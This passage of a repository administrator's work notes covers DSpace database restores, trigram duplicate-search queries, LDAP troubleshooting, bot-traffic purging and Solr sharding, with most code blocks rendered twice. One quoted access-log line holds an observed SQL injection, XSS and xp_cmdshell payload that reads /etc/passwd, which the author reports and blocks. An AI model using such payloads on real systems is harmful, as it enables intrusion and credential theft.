</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest superuser;&#39;</span>
</span></span><span style="display:flex;"><span>$ pg_restore -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -d dspace7 -O --role<span style="color:#f92672">=</span>dspacetest -h localhost dspace-2021-10-09.backup
</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest nosuperuser;&#39;</span>
</span></span></code></pre></div><ul>

- Delete Atmire migrations and some others that were "unresolved":
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;&#34;</span>
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;&#34;</span>
</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);&#34;</span>
</span></span></code></pre></div><ul>

- Now DSpace 7 starts with my CGSpace data... nice
  - The Discovery indexing still takes seven hours... fuck
- Start a full Discovery reindex on my local DSpace 6.3 instance:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ /usr/bin/time -f %M:%e chrt -b <span style="color:#ae81ff">0</span> ~/dspace63/bin/dspace index-discovery -b
Loading @mire database changes for module MQM
Changes have been processed
836140:6543.6
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e chrt -b <span style="color:#ae81ff">0</span> ~/dspace63/bin/dspace index-discovery -b
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>836140:6543.6
</span></span></code></pre></div><ul>
<li>So that&rsquo;s 1.8 hours versus 7 on DSpace 7, with the same database!</li>
<li>Several users wrote to me that CGSpace was slow recently
<ul>
@ -481,13 +481,13 @@ Changes have been processed
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
53
$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
1697
$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceWeb&#39;&#34;</span> | wc -l
1681
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>53
</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
</span></span><span style="display:flex;"><span>1697
</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceWeb&#39;&#34;</span> | wc -l
</span></span><span style="display:flex;"><span>1681
</span></span></code></pre></div><ul>

- Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:

![PostgreSQL locks week](/cgspace-notes/2021/10/postgres_locks_ALL-week.png)
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.5;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.5;
</span></span></code></pre></div><ul>
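
Note that `SET pg_trgm.similarity_threshold` only lasts for the current session, so when scripting this from the shell both statements have to go into the same psql invocation; a sketch, assuming a local `dspace` database:

```console
$ psql -h localhost dspace -c "SET pg_trgm.similarity_threshold = 0.5; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';"
```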

- Next I experimented with using GIN or GiST indexes on `metadatavalue`, but they were slower than the existing DSpace indexes
  - I tested a few variations of the query I had been using and found it's *much* faster if I use the similarity operator and keep the condition that object IDs are in the item table...
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 739.948 ms
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
</span></span><span style="display:flex;"><span> text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
</span></span><span style="display:flex;"><span>(1 row)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 739.948 ms
</span></span></code></pre></div><ul>

- Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!
- I still don't understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate
- So to summarize, the best to the worst query, all returning the same result:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 683.165 ms
Time: 635.364 ms
Time: 674.666 ms
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 1584.765 ms (00:01.585)
Time: 1665.594 ms (00:01.666)
Time: 1623.726 ms (00:01.624)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 4028.939 ms (00:04.029)
Time: 4022.239 ms (00:04.022)
Time: 4061.820 ms (00:04.062)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 4358.713 ms (00:04.359)
Time: 4301.248 ms (00:04.301)
Time: 4417.909 ms (00:04.418)
</code></pre></div><h2 id="2021-10-13">2021-10-13</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
</span></span><span style="display:flex;"><span> text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
</span></span><span style="display:flex;"><span>(1 row)
Time: 683.165 ms
Time: 635.364 ms
Time: 674.666 ms

localhost/dspace= > DISCARD ALL;
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                           text_value                                            │           dspace_object_id
─────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
 Traditional knowledge affects soil management ability of smallholder farmers in marginal areas  │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)

Time: 1584.765 ms (00:01.585)
Time: 1665.594 ms (00:01.666)
Time: 1623.726 ms (00:01.624)

localhost/dspace= > DISCARD ALL;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                           text_value                                            │           dspace_object_id
─────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
 Traditional knowledge affects soil management ability of smallholder farmers in marginal areas  │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)

Time: 4028.939 ms (00:04.029)
Time: 4022.239 ms (00:04.022)
Time: 4061.820 ms (00:04.062)

localhost/dspace= > DISCARD ALL;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                           text_value                                            │           dspace_object_id
─────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
 Traditional knowledge affects soil management ability of smallholder farmers in marginal areas  │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)

Time: 4358.713 ms (00:04.359)
Time: 4301.248 ms (00:04.301)
Time: 4417.909 ms (00:04.418)
```
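- The timings suggest the `%` operator is the fastest of the three approaches: it honors `pg_trgm.similarity_threshold` and can be served by a trigram index, while calling `SIMILARITY()` in the `WHERE` clause forces PostgreSQL to compute the similarity for every row
  - A minimal sketch of the index-backed setup (the index name is hypothetical, and I have not checked whether this index already exists here):

```console
$ psql -d dspace -c 'CREATE EXTENSION IF NOT EXISTS pg_trgm;'
$ psql -d dspace -c 'CREATE INDEX metadatavalue_text_value_trgm_idx ON metadatavalue USING gin (text_value gin_trgm_ops);'
# with the index in place, EXPLAIN ANALYZE on the % query should show a
# bitmap index scan instead of a sequential scan
```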
## 2021-10-13
- I looked into the [REST API issue where fields without qualifiers throw an HTTP 500](https://github.com/DSpace/DSpace/issues/7946)
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;booo&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=fuuu)&#34;</span>
Enter LDAP Password:
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;booo&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=fuuu)&#34;</span>
</span></span><span style="display:flex;"><span>Enter LDAP Password:
</span></span><span style="display:flex;"><span>ldap_bind: Invalid credentials (49)
</span></span><span style="display:flex;"><span> additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
</span></span></code></pre></div><ul>
- I sent a message to ILRI ICT to ask them to check the account (the `data 52e` sub-code from Active Directory means the credentials themselves are invalid, as opposed to the account being locked or expired)
  - They reset the password, so I ran all system updates and rebooted the server since users weren't able to log in anyway
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ http <span style="color:#e6db74">&#39;localhost:8081/solr/statistics/select?q=time%3A2021-04*&amp;fl=ip&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&amp;facet.limit=200000&amp;facet.mincount=1&#39;</span> &gt; /tmp/2021-04-ips.json
# Ghetto way to extract the IPs using jq, but I can<span style="color:#960050;background-color:#1e0010">&#39;</span>t figure out how only print them and not the facet counts, so I just use sed
$ jq <span style="color:#e6db74">&#39;.facet_counts.facet_fields.ip[]&#39;</span> /tmp/2021-04-ips.json | grep -E <span style="color:#e6db74">&#39;^&#34;&#39;</span> | sed -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> &gt; /tmp/ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u &gt; /tmp/networks-to-block.txt
$ wc -l /tmp/networks-to-block.txt
125 /tmp/networks-to-block.txt
$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt &gt; /tmp/ips-to-purge.txt
$ wc -l /tmp/ips-to-purge.txt
202
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ http <span style="color:#e6db74">&#39;localhost:8081/solr/statistics/select?q=time%3A2021-04*&amp;fl=ip&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&amp;facet.limit=200000&amp;facet.mincount=1&#39;</span> &gt; /tmp/2021-04-ips.json
</span></span><span style="display:flex;"><span># Ghetto way to extract the IPs using jq, but I can<span style="color:#960050;background-color:#1e0010">&#39;</span>t figure out how only print them and not the facet counts, so I just use sed
</span></span><span style="display:flex;"><span>$ jq <span style="color:#e6db74">&#39;.facet_counts.facet_fields.ip[]&#39;</span> /tmp/2021-04-ips.json | grep -E <span style="color:#e6db74">&#39;^&#34;&#39;</span> | sed -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> &gt; /tmp/ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u &gt; /tmp/networks-to-block.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/networks-to-block.txt
</span></span><span style="display:flex;"><span>125 /tmp/networks-to-block.txt
</span></span><span style="display:flex;"><span>$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt &gt; /tmp/ips-to-purge.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ips-to-purge.txt
</span></span><span style="display:flex;"><span>202
</span></span></code></pre></div><ul>
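- grepcidr matches plain IP addresses against the CIDR ranges in the network list, so it is also handy for spot-checking a single suspicious address (a sketch; the address here is just a placeholder):

```console
$ echo 1.2.3.4 | grepcidr -f /tmp/networks-to-block.txt
```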
- Attempting to purge those only shows about 3,500 hits, but I will do it anyway
  - Adding 64.39.108.48 from Qualys I get a total of 22,631 hits purged
- Even more annoying, they are not re-using their session ID:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
4888
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>4888
</span></span></code></pre></div><ul>
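- For comparison, a rough count of the total requests from that IP in the same log would presumably be just (a sketch):

```console
$ grep -c 93.158.91.62 log/dspace.log.2021-10-29
```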
- This IP has made 36,000 requests to CGSpace…
- The IP is owned by [Internet Vikings](internetvikings.com) in Sweden
- I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent
- I added these two IPs to the nginx IP bot identifier
- Jesus, I found a few Russian IPs attempting SQL injection and path traversal, e.g.:
<pre tabindex="0"><code>45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] &quot;GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&amp;OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1&quot; 200 143070 &quot;https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf&quot; &quot;Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11&quot;
<pre tabindex="0"><code>45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] &#34;GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&amp;OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1&#34; 200 143070 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11&#34;
</code></pre><ul>
<li>I reported them to AbuseIPDB.com and purged their hits:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
Purging 6364 hits from 45.9.20.71 in statistics
Purging 8039 hits from 45.146.166.157 in statistics
Purging 3383 hits from 45.155.204.82 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 17786
</code></pre></div><h2 id="2021-10-31">2021-10-31</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
</span></span><span style="display:flex;"><span>Purging 6364 hits from 45.9.20.71 in statistics
</span></span><span style="display:flex;"><span>Purging 8039 hits from 45.146.166.157 in statistics
</span></span><span style="display:flex;"><span>Purging 3383 hits from 45.155.204.82 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 17786
</span></span></code></pre></div><h2 id="2021-10-31">2021-10-31</h2>
- Update Docker containers for AReS on linode20 and run a fresh harvest
- Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent "Microsoft Internet Explorer"
- That's from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it's [Availo Networks AB](availo.se)
- There's another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it's using a normal user agent
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
3991
~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE &#39;GET /rest/(collections|handle|items)&#39; | sort | uniq -c
3154 GET /rest/collections
427 GET /rest/handle
410 GET /rest/items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
</span></span><span style="display:flex;"><span>3991
</span></span><span style="display:flex;"><span>~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE &#39;GET /rest/(collections|handle|items)&#39; | sort | uniq -c
</span></span><span style="display:flex;"><span> 3154 GET /rest/collections
</span></span><span style="display:flex;"><span> 427 GET /rest/handle
</span></span><span style="display:flex;"><span> 410 GET /rest/items
</span></span></code></pre></div><ul>
- It requested the [CIAT Story Maps](https://cgspace.cgiar.org/handle/10568/75560) collection over 3,000 times last month…
  - I will purge those hits
- I experimented with manually sharding the Solr statistics on DSpace Test
- First I exported all the 2019 stats from CGSpace:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div><ul>
- Then on DSpace Test I created a `statistics-2019` core with the same instance dir as the main `statistics` core (as [illustrated in the DSpace docs](https://wiki.lyrasis.org/display/DSDOC6x/Testing+Solr+Shards))
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
# create core in Solr admin
$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;time:2019-*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
</span></span><span style="display:flex;"><span># create core in Solr admin
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;time:2019-*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
</span></span></code></pre></div><ul>
- The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist, so you have to create it in the file system first (see the sketch after this list)
- I restarted the server after the import was done to see if the cores would come back up OK
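For reference, a rough equivalent of the admin UI step using Solr's CoreAdmin API (a sketch; the `instanceDir` and `dataDir` values are assumed from the paths above):

```console
$ curl "http://localhost:8081/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=statistics&dataDir=/home/dspacetest.cgiar.org/solr/statistics-2019/data"
```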
